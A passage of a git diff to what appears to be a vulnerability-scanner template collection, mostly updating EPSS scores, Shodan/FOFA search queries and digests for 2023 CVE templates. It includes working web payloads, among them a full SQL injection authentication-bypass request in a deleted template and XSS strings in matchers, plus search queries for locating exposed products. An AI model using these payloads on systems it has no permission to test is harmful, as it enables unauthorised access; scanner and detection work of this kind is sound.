"onanimationstart=alert(document.domain)//")' - 'contains(body_2, "Advanced Custom Fields")' condition: and -# digest: 490a00463044022056850f415fae2d0929dad93fe10665c4ffa3942c147dfc81c7ebf791f92ac5b50220214d9094cddb98c12f33f8027ead5c1b1977b3ac248e35474df4173260e464fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203519c9cc80a50590dae099f69444e784bec905dbd3d0cfd0444fb1ef60816d1f02204fe21213712048f52f207ad3a25a4f50937bf470a0ad505e3c872ebe10b77193:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30868.yaml b/http/cves/2023/CVE-2023-30868.yaml index a1c8a9246e..9a372736b1 100644 --- a/http/cves/2023/CVE-2023-30868.yaml +++ b/http/cves/2023/CVE-2023-30868.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30868 cwe-id: CWE-79 - epss-score: 0.00069 - epss-percentile: 0.28435 + epss-score: 0.00114 + epss-percentile: 0.44861 cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -47,4 +47,4 @@ http: - 'contains(body_2, "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E") && contains(body_2, "CMS Tree Page View")' - 'status_code_2 == 200' condition: and -# digest: 4b0a00483046022100be09a7bfdcc1497edc43924eab1f4067bcaa9567f68893d5408a9fecf5225de302210082881da0e9b08085c550a7bba75ab651b42f223287c1dd66731cf28ebd69b507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220190481a719136316c9ba89f9f2939e193e19bd3ed466d8d7e2e0a1c8d83f4eab0221009305805e4a7c444a33913a5937a05df99836aebb8cbe484b636680272ddbde7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index 5622e5128f..cbc4eced14 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -19,14 +19,19 @@ info: cvss-score: 5.3 cve-id: CVE-2023-30943 cwe-id: CWE-610,CWE-73 - epss-score: 0.01661 - epss-percentile: 0.87339 + epss-score: 0.01155 + epss-percentile: 0.84809 cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: moodle product: moodle - shodan-query: title:"Moodle" + shodan-query: + - title:"Moodle" + - cpe:"cpe:2.3:a:moodle:moodle" + - http.title:"moodle" + fofa-query: title="moodle" + google-query: intitle:"moodle" tags: cve,cve2023,moodle,xss,rce,authenticated http: @@ -78,4 +83,4 @@ http: regex: - 'name="logintoken" value="([a-zA-Z0-9]+)">' internal: true -# digest: 4b0a004830460221008f298a6e3c9630e270f965e1eb76ad282dc1013c066ba86b81ca984e5c759221022100b3cadd4c5e1edc8028ee6372aa7c634e053893e68cee34de8fdc2e8ce44c75cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220746984a5ba9bde1458e109d2aa1e09cf2c9d344a97074d263836f7a56d72cb440220444a9d8b85eedfe739e6caf0faa3c4d580917fce8252564ae6a16b62d9e1c0d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index 98cab63fb6..94ef873a7d 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -18,16 +18,21 @@ info: cvss-score: 7.5 cve-id: CVE-2023-31059 cwe-id: CWE-22 - epss-score: 0.00393 - epss-percentile: 0.70614 + epss-score: 0.00878 + epss-percentile: 0.8245 cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: repetier-server product: repetier-server - shodan-query: title:"Repetier-Server" - fofa-query: title="Repetier-Server" + shodan-query: + - title:"Repetier-Server" + - http.title:"repetier-server" + fofa-query: + - title="Repetier-Server" + - title="repetier-server" + google-query: intitle:"repetier-server" tags: cve2023,cve,repetier,lfi,repetier-server http: @@ -45,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022037988cb94ec5fefe05f0dd589b9f27b78e4d9b73921069ebaccb42a00135ca7a02200fd647168e28fb0e37753bdd00a50dcf4ac7cb131ef5a7dce28ad22f8220aa9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbe4ace80cde1e29fc29ac4d1e6f074aeae9ff82f6623c1684d84ae94fe4388a022100b484e439856284c6477913f83350c973bd6c7885acf29be352872757737659fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31446.yaml b/http/cves/2023/CVE-2023-31446.yaml index 5511a3bccd..8d35f7059f 100644 --- a/http/cves/2023/CVE-2023-31446.yaml +++ b/http/cves/2023/CVE-2023-31446.yaml @@ -16,16 +16,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-31446 - epss-score: 0.00066 - epss-percentile: 0.27828 + epss-score: 0.01982 + epss-percentile: 0.8876 cpe: cpe:2.3:o:cassianetworks:xc1000_firmware:2.1.1.2303082218:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cassianetworks product: xc1000_firmware - shodan-query: html:"Cassia Bluetooth Gateway Management Platform" - tags: cve,cve2023,rce,cassia,gateway + shodan-query: + - html:"Cassia Bluetooth Gateway Management Platform" + - http.html:"cassia bluetooth gateway management platform" + fofa-query: body="cassia bluetooth gateway management platform" + tags: cve,cve2023,rce,cassia,gateway,cassianetworks http: - raw: @@ -44,4 +47,4 @@ http: - type: regex regex: - "^OK$" -# digest: 4a0a00473045022100a8303b0cd10a64a26c1017b52482339440bbe857e22361f8d58e29bed65bc03302205340556a2173736013f81b1ad2bfa44459a577ac9e4ee71bbf10a5f1917725bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207552813231c8cd4ce36e81ce6020b8fb240bbb0de7ddba8012b8ef319aaeecbe022100b7953d7c39b75c5fcbf86321660e8ae8c440cd2332db415f2fbabb65aa1b5ec4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31465.yaml b/http/cves/2023/CVE-2023-31465.yaml index a18e260a91..fde0e95710 100644 --- a/http/cves/2023/CVE-2023-31465.yaml +++ b/http/cves/2023/CVE-2023-31465.yaml @@ -14,14 +14,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-31465 - epss-score: 0.00841 - epss-percentile: 0.80295 + epss-score: 0.0156 + epss-percentile: 0.87192 cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fsmlabs product: timekeeper shodan-query: http.favicon.hash:2134367771 + fofa-query: icon_hash=2134367771 tags: cve,cve2023,timekeeper,rce,oast,fsmlabs http: @@ -41,4 +42,4 @@ http: part: body words: - '{"seriesID":' -# digest: 490a0046304402201eb69dd460edd54d047f99e7c17e6536f36af9d8c7d2154a6c83cbd7fc8c268a02202960f6694f51f8c7d773f12ee9e40deabe3a8b55921acfe988226be8aa75dfc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022062b6e0c0530f09a4fb5d82a488bb5a9b8c30e17a30cbf0322716f416f5cd2bc902207130d6f8d9a489b594915a4459ad3e54c7ea4415774bb7b9b5b08f0654747fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index c7109ccf8f..1bc2341040 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-31548 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32076 + epss-score: 0.00089 + epss-percentile: 0.37968 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true @@ -53,4 +53,4 @@ http: - 'contains(body_2, "onfocus=\"alert(document.domain)\" autofocus=\"\">")' - 'contains(body_2, "ChurchCRM")' condition: and -# digest: 4a0a004730450221009a02aa59a6a1236d95d032bfb4241ced35bf26029952519fd2031904e69f134f0220414be6fa3a6f964f5e9e9c9a3d99939b24c5d7d95a3315a4eda5b29f923afc61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7a5e13d5c7dc991bd7a56540690cd04e964d143cb0cb207bafa4b40056f7078022100a0dd45c4c270376c10d96a5ce999d8e6774ad21ce9423a7eb28770710358e9d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32077.yaml b/http/cves/2023/CVE-2023-32077.yaml index 5bddf6b981..4e7e9a12a7 100644 --- a/http/cves/2023/CVE-2023-32077.yaml +++ b/http/cves/2023/CVE-2023-32077.yaml @@ -10,17 +10,20 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-32077 - cwe-id: CWE-321,CWE-798 - epss-score: 0.0006 - epss-percentile: 0.24707 + cwe-id: CWE-798,CWE-321 + epss-score: 0.08146 + epss-percentile: 0.94315 cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: gravitl product: netmaker - shodan-query: html:"netmaker" - tags: cve,cve2023,info-key,netmaker,exposure + shodan-query: + - html:"netmaker" + - http.html:"netmaker" + fofa-query: body="netmaker" + tags: cve,cve2023,info-key,netmaker,exposure,gravitl http: - method: GET @@ -37,4 +40,4 @@ http: - 'contains(header, "application/json")' - 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")' condition: and -# digest: 490a00463044022044db0025b30ee01f7b653b83140795eaf85cb6c5037c5f592c309666b0191a660220208862f3f2eb0ddb3dcc357a3c4811cc439136e6f123760564c5c0cf2f9274ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008d63b3ce01cf22987b6cf64df037911bfc94b9680dab796149106c4f2f5d77d5022100eac15d1f9d58ec0bfff470c26143a947c37a8eddb07d75c9f73b28c07ee0c1df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index 40e72fb07b..14bb0297ba 100644 --- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-3219 cwe-id: CWE-639 - epss-score: 0.17304 - epss-percentile: 0.95981 + epss-score: 0.08542 + epss-percentile: 0.94439 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +28,17 @@ info: vendor: myeventon product: eventon framework: wordpress - publicwww-query: "/wp-content/plugins/eventon-lite/" + shodan-query: + - http.html:/wp-content/plugins/eventon/ + - http.html:/wp-content/plugins/eventon-lite/ + fofa-query: + - wp-content/plugins/eventon/ + - body=/wp-content/plugins/eventon/ + - body=/wp-content/plugins/eventon-lite/ + publicwww-query: + - "/wp-content/plugins/eventon-lite/" + - /wp-content/plugins/eventon/ + google-query: inurl:"/wp-content/plugins/eventon/" tags: cve,cve2023,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon-lite,bypass,myeventon http: @@ -53,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100de57a10bfb7f4faa9acd530eede927372fc258914a5d1f5fa476a9317bea80db0220635e62864d2ab58097102400c7516d610bdd42516cbb280f12aab1e009a3b21b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201fd37b8f5b61f1b2b5e068d1d960779229bbe02aa80d3409b0df488b194dc59902207b86a8a61fe12433d239e9baeab759fda69bc1ca07f54f9a5c0e1c51ea8473d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index 2ce3b43853..2ea5a84040 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -28,7 +28,9 @@ info: vendor: ghost product: ghost framework: node.js - shodan-query: http.component:"Ghost" + shodan-query: + - http.component:"Ghost" + - http.component:"ghost" tags: cve2023,cve,lfi,ghostcms,ghost,node.js http: @@ -57,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fbca3a5b5a8ac4a7eaafda3c2cbe5cc873d6cd67352a064da2ef31df6ea2f873022049978a0eed228cc990d6f36ac90840521f77cb40a3a5003d32717cb5f1b9b343:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009d9ed3064bcd327602a7875a9ddb31977e70e750115974413440ce5bbf1889800220730e9fb8ec81413a05f5827e7357d6c60d56eb35b55a5cbc956473a69dd9fc02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index 9578cfe944..5fac83ca7a 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-32243 cwe-id: CWE-287 - epss-score: 0.03267 - epss-percentile: 0.91046 + epss-score: 0.08653 + epss-percentile: 0.94489 cpe: cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -108,4 +108,4 @@ http: - type: dsl dsl: - '"WP_USERNAME: "+ wordpress_username + " WP_PASSWORD: "+ password' -# digest: 4a0a00473045022100a26b83d631646ec09af3af65eb293c9a3f3761a84afecbfca21c5e8f0973d6fe022064a99db818cef379e23b844ee31a73da1796fdad71351add8163625aaf7e6a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d9afa0d68b07694175c57ad8f7b5388a4b0ad0ec1f92993ad5ec4a15dd38e5ef022100bafc6ce6e931ccb821730c75059d98cbee26f3827f8fa6541ed7ed0884abacbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 26a48d8fe1..2b732ca387 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -21,15 +21,24 @@ info: cvss-score: 7.5 cve-id: CVE-2023-32315 cwe-id: CWE-22 - epss-score: 0.97384 - epss-percentile: 0.99904 + epss-score: 0.97409 + epss-percentile: 0.99927 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: igniterealtime product: openfire - shodan-query: title:"openfire" + shodan-query: + - title:"openfire" + - http.title:"openfire" + - http.title:"openfire admin console" + fofa-query: + - title="openfire" + - title="openfire admin console" + google-query: + - intitle:"openfire" + - intitle:"openfire admin console" tags: cve2023,cve,auth-bypass,openfire,console,kev,igniterealtime http: @@ -55,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202de73ede6c782fa2e7558f120af51ccdb43e6a834f0cb11b796ac10f14abf745022068858456f26584ae6b4d402af1069998db1db3a842d77a00531bafc642d74867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f46350a76d4e9345ad71b36049882b6db03da4ba70de2031b8571c5509e1e50022019d5ad1a41e7bd689e702bcca7215ae184e92e401ab005b6dc29345a8ea07954:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index 8b70377236..03d2a62bd3 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-32563 cwe-id: CWE-22 - epss-score: 0.43167 - epss-percentile: 0.97254 + epss-score: 0.34709 + epss-percentile: 0.97105 cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -57,4 +57,4 @@ http: part: body_2 words: - "CVE-2023-32563" -# digest: 490a0046304402207ef41427803cc77d9625eb96fcb7415c04bb9cdb0cc70363d165754c36f0c44902204d3a8adef4461aac1fac0b12e9ce6ec990138f2a800440d04195167b5401293a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bcb886c214a8274523a21aff0b8a3ddb9c802aaf224163eff068884c00eeb89a0221009d23274822bbcdf1d23b8faad8293c92291c08909d8e7419b963dc6644e10b5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 249fe93d11..4d986e27d9 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-33338 cwe-id: CWE-89 - epss-score: 0.0152 - epss-percentile: 0.8674 + epss-score: 0.01754 + epss-percentile: 0.87944 cpe: cpe:2.3:a:phpgurukul:old_age_home_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -47,4 +47,4 @@ http: - 'contains(body_2, "Change Password")' - 'contains(body_2, "Old Age Home Management System|| Dashboard")' condition: and -# digest: 4a0a00473045022049057b44ba68b587a1d00ddececb11eb4b27973f9ed5ba5245e260357d80f01e022100c0abd873024b519872465347f63f229d7d4f19a80fa3fefb6e91f5645122b483:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220603bdc568c4f8bd254d3de537116f53403754a72af1ec456be55b3cc86bbad9b022100fb5e43cac19c09bc220b1ca500ce14df1866cf778dad28ecdc0da95f52ff3ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33405.yaml b/http/cves/2023/CVE-2023-33405.yaml index aa6c4e6873..1d2dbc4bd0 100644 --- a/http/cves/2023/CVE-2023-33405.yaml +++ b/http/cves/2023/CVE-2023-33405.yaml @@ -25,6 +25,8 @@ info: max-request: 1 vendor: blogengine product: blogengine.net + shodan-query: http.html:"blogengine.net" + fofa-query: body="blogengine.net" tags: cve2023,cve,Blogengine,cms,redirect,blogengine http: @@ -37,4 +39,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' part: header -# digest: 4b0a00483046022100a8cc2487ecefb4e25e4229b95328dd670f5646f049cec123bc2d0f5f2d34c710022100fe1204d93a53829adb780486928f36bf4a2e53c68e323ebbaa01efa091650583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220688bfd54312c98cad70ea11756eb7d605e63cefdbf740953ec17b2758ffc9b58022074870fe4f5e1a9bad57a43ddb9c459c577ed1d240208b5b0a52d9830f15e5a70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index 804a38e40c..06995026bc 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-33439 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.79241 + epss-score: 0.00778 + epss-percentile: 0.81335 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -48,4 +48,4 @@ http: - 'contains(body, "Fatal error:")' - 'contains(body, "XPATH syntax error:")' condition: and -# digest: 4a0a00473045022038e305e1a427828938e09914041e2f6b067eac093c57894b8e785e2226c492120221009c7b52f37dbe1da9686032f5a6807f5ebe4accd86ee5119086ce69fb0d806439:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9a83ae1afdf43ea099513f3584f1caac1e8a777e61d101821e80a29960249cb022074a42afd0ca26223778dcd1ea8d2372e6b5b53f971633f5b7fb4ac1f8c35b7d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index 0f5cb8901a..6c819010db 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-33440 cwe-id: CWE-434 - epss-score: 0.08056 - epss-percentile: 0.93711 + epss-score: 0.07644 + epss-percentile: 0.94146 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,7 +30,6 @@ info: vendor: faculty_evaluation_system_project product: faculty_evaluation_system tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project - variables: email: "{{randstr}}@{{rand_base(5)}}.com" string: "CVE-2023-33440" @@ -86,4 +85,4 @@ http: - 'len(body_1) == 1' - 'contains(body_2, "Faculty Evaluation")' condition: and -# digest: 4a0a00473045022100f46293b8073f7feb73466f375ea29605a51c096af01c4816241166a69c603631022014393248bcab1932c5437e8434c9d61f71848a6068b89042745e3b10cc28e967:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201b5d53a634d522ffd0302ad7feec865783d2a241b8f3ccfd0b3d4a8d441a765202207e6111dade4a0684ae0224bab14df4d8e4ee5a17142d2c379d1615b52abc4032:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 2d92d84f95..57ae61a021 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-3345 cwe-id: CWE-200 - epss-score: 0.00235 - epss-percentile: 0.61522 + epss-score: 0.00446 + epss-percentile: 0.74935 cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,7 +29,7 @@ info: vendor: masteriyo product: masteriyo framework: wordpress - tags: cve2023,cve,wp-plugin,xss,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo + tags: cve2023,cve,wp-plugin,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo http: - raw: @@ -75,4 +75,4 @@ http: regex: - '"nonce":"([a-z0-9]+)","versionString' internal: true -# digest: 490a0046304402204cddd6c9737174b06878b047f621154b32a59366060b58df57cbb1318e18e4e1022059195669346394d99d71b58326ae9be8679220489112cbd7e6e09528a8ab05a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df1e86d9fc956df53bf31eecfcb419718e7cb6b90305c5927341af67c249bcb30220608d59b3161d92fd9e28b9c9c7ea01c5e879c25bc20d0b247590501904e508c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index cd7f863611..b11596ec06 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-33510 cwe-id: CWE-668 - epss-score: 0.00347 - epss-percentile: 0.6879 + epss-score: 0.00406 + epss-percentile: 0.73689 cpe: cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -30,6 +30,7 @@ info: product: jeecg_p3_biz_chat framework: wordpress shodan-query: http.favicon.hash:1380908726 + fofa-query: icon_hash=1380908726 tags: cve2023,cve,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress http: @@ -47,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009e162dbb1787d5c8b032abe3bf70bb51a039c53b2df9c8e71d5971b297d962bb0221009b98beb3b2add0df90bddc57c9ed57f15adc1f361360d012658f5c9e2265d724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220171abcc1c0a83a429a04ba26dc24dbabb63a86500669886aac8290f2fe0e7c81022100a1b42db8bf7ef06ccf26e400d065cc3b7b4871399e0b76c0500aa7b121e4b29e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index 69f89cf485..8ad2d88a92 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-33568 cwe-id: CWE-552 - epss-score: 0.62868 - epss-percentile: 0.97558 + epss-score: 0.4855 + epss-percentile: 0.97483 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -30,6 +30,7 @@ info: vendor: dolibarr product: dolibarr_erp\/crm shodan-query: http.favicon.hash:440258421 + fofa-query: icon_hash=440258421 tags: cve2023,cve,dolibarr,unauth http: @@ -49,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ea402dd44c43bec190ee2c16ae40ec0becb281a3f9867e3060d721011b78172f0220207c33b176fb9d8e6bf50fe9c81e797fd14fa29c9e39886d850c61d378f9f352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220134e0463102496737a2efd38625b6a7aeda5925f8f9924751b0917a46cc17d10022065a6e0e9df979a4efc3ee24912f2916fd08762932995091f79ea114ddf822664:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33584.yaml b/http/cves/2023/CVE-2023-33584.yaml deleted file mode 100644 index 2d6c0d98ac..0000000000 --- a/http/cves/2023/CVE-2023-33584.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2023-33584 - -info: - name: Enrollment System Project v1.0 - SQL Injection Authentication Bypass - author: r3Y3r53 - severity: critical - description: | - Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system. - reference: - - https://www.exploit-db.com/exploits/51501 - - https://nvd.nist.gov/vuln/detail/CVE-2023-33584 - - https://packetstormsecurity.com/files/cve/CVE-2023-33584 - - https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html - - https://github.com/akarrel/test_enrollment - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-33584 - cwe-id: CWE-89 - epss-score: 0.09977 - epss-percentile: 0.94731 - cpe: cpe:2.3:a:enrollment_system_project:enrollment_system:1.0:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: enrollment_system_project - product: enrollment_system - tags: cve2023,cve,packetstorm,sqli,exploitdb,unauth,enrollment,enrollment_system_project - -http: - - raw: - - | - POST /enrollment/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username='+or+1%3D1+%23&password={{randstr}} - - | - GET /enrollment/index.php?page=home HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: dsl - dsl: - - 'contains(body_2, "Administrator") && contains(body_2, "Dashboard")' - - 'contains(content_type, "text/html")' - - 'status_code == 200' - condition: and -# digest: 490a0046304402202f40626ab7516149dc904a0b037b08e20f1600b2c5120af0de3a1ae0c7734d740220179ff4ff2a58eb3877f3c34bb4da803721baf5aeb1e1f69ace56203fd229a98a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index 9d1ec8f566..125a2ac99c 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -16,15 +16,17 @@ info: cvss-score: 7.2 cve-id: CVE-2023-33629 cwe-id: CWE-787 - epss-score: 0.00968 - epss-percentile: 0.82988 + epss-score: 0.01254 + epss-percentile: 0.85534 cpe: cpe:2.3:o:h3c:magic_r300-2100m_firmware:r300-2100mv100r004:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: h3c product: magic_r300-2100m_firmware - fofa-query: app="H3C-Ent-Router" + fofa-query: + - app="H3C-Ent-Router" + - app="h3c-ent-router" tags: cve2023,cve,router,rce,h3c variables: filename: "{{to_lower(rand_text_alpha(7))}}" @@ -48,4 +50,4 @@ http: - status_code_2 == 200 - contains_all(body_2, 'www', 'www_multi') condition: and -# digest: 4b0a00483046022100b6854bf0faa5050128ca42d2d2ee3d37b3e95d98ee44027b193290a3cb94d1690221008fc6436949fc3b2d1ec7052d3740326ec505a58597f35ba52a30bae0163b9a2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# 